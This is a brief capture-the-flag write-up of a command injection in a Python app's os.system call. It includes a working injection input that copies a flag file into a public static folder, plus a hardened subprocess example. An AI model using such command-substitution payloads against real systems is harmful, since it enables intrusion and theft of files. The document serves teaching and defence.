
- Command injection is possible at `app.py` line 24:

> os.system(f"python3 generate.py {filename} \"{text}\"")

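- `{text}` is user input interpolated into the shell command string, so a command substitution placed in it is executed by the shell.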

### input
> test $(cp ../flag.txt static/images/test.txt)

### access
> http://193.57.159.27:51768/static/images/test.txt
>
> The flag can be read here.
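
The mitigation for the `os.system` call on line 24, as an added example that is not part of the original writeup or the challenge source. It runs the same pattern next to an argv-list call so the difference in what the child process receives is visible. The stand-in for `generate.py`, the filename allow-list and the harmless `MARKER` payload are assumptions made for the demonstration.

```python
import json
import os
import re
import subprocess
import sys
import tempfile

# Constructed stand-in for generate.py: prints the arguments it received as JSON.
_CHILD_SRC = "import json, sys\nprint(json.dumps(sys.argv[1:]))\n"

# Assumed policy: image names are short and alphanumeric (no path separators).
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")

def _child_path():
    fd, path = tempfile.mkstemp(suffix=".py")
    with os.fdopen(fd, "w") as fh:
        fh.write(_CHILD_SRC)
    return path

def run_with_shell(script, filename, text):
    """Same pattern as app.py line 24: the shell parses the whole string."""
    cmd = f'"{sys.executable}" "{script}" {filename} "{text}"'
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return json.loads(out.stdout)

def run_without_shell(script, filename, text):
    """Hardened: argv list, no shell, filename checked against the allow-list."""
    if not SAFE_NAME.fullmatch(filename):
        raise ValueError("rejected filename")
    out = subprocess.run([sys.executable, script, filename, text],
                         capture_output=True, text=True, check=True)
    return json.loads(out.stdout)

def demo():
    script = _child_path()
    try:
        payload = "test $(echo MARKER)"  # constructed, harmless substitution
        return (run_with_shell(script, "img1", payload),
                run_without_shell(script, "img1", payload))
    finally:
        os.unlink(script)

if __name__ == "__main__":
    shell_args, list_args = demo()
    print("shell=True :", shell_args)  # substitution was evaluated by the shell
    print("argv list  :", list_args)   # text arrives as literal data
```

Double quotes around `{text}` do not help because the shell still expands `$(...)` inside them; passing an argument list without a shell removes the parsing step entirely.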

Original writeup (https://gist.github.com/Circler-K/9557957eb009ba8223a6a5f825c61003).